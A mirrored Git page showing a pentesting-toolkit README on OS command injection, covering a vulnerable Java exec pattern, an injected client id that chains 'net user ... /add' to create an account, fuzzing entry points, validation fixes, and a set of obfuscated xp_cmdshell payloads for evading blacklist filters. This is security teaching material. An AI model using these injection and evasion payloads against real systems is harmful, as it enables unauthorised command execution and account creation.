Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-04-28 11:36:08 -04:00
Code Issues Packages Projects Releases Wiki Activity
sec-pentesting-toolkit/Web_Security/OS_Command_Injection/README.md
bt3gl f3a1895380 web security
2014-11-20 09:58:54 -05:00

105 lines
2.8 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# OS Command Injection
* Methodology:
- Identify data entry points
- Inject data (payloads)
- Detect anomalies from the response.
- Automate
* For example for snippet:
```
String cmd = new String("cmd.exe /K processReports.bat clientId=" + input.getValue("ClientId"));
Process proc = Runtime.getRuntime().exec(cmd);
```
For a client id equal **444**, we would have the following string:
```
cmd.exe /K processReports.bat clientId=444
```
However, an attacker could run use the client id equal **444 && net user hacked hackerd/add**. In this case, we have the following string:
```
cmd.exe /K processReports.bat clientId=444 && net user hacked hacked /add
```
## Examples of Injectuon Payloads:
* Control characters and common attack strings:
- '-- SQL injection
- && | OS Command Injection
- <> XSS
* Long strings (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
* Binary or Null data
## Fuzz Testing Web Applications
* Focus on the relevant attack sruface of the web application.
* Typically HTTP request parameters:
- QueryString
- POST data
- Cookies
- Other HTTP headers (User-Agent, Referer)
* Other entry points with request structures:
- XML web services
- WCF, GWT, AMF
- Remote Method Invoation (RMI)
* Fixing injection flaws:
- Comphehensive, consistent server-side input validation
- User Safe command APIs
- Avoid concatenating strings passed to an interpreter
- Use strong data types in favor of strings
### Whitelist input validation
- Input validated against known GOOD values.
- Exact match:
* A specific list of exact values is defined
* Difficult when large set of values is expected
- Pattern matching:
* Values are matched against known good input patterns.
* Data type, regular expressions, etc.
### Blacklist input validation
- Input validated against known BAD values.
- Not as effective as whitelist validation.
* Susceptible to bypass via encoding
* Global protection and therefore often not aware of context.
- Constantly changing given dynamic of application attacks.
#### Evading Blacklist filters
Exploit payloads:
```
';exec xp_cmdshell 'dir';--
```
```
;Declare @cmd as varchar(3000);Set @cmd =
x+'p+'_+'c+'m+'d+s+'h+'e+'l+'l+'/**/+””+d+i'+r+””;exec(@cmd);--
```
```
;ex/**/ec xp_cmds/**/hell dir;--
```
```
Declare @cmd as varchar(3000);Set @cmd
=(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHA
R(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+
CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CH
AR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);--
```
```
;Declare @cmd as varchar(3000);Set @cmd =
convert(varchar(0),0×78705F636D647368656C6C202764697227);exec(@cmd);--
```
Reference in New Issue View Git Blame Copy Permalink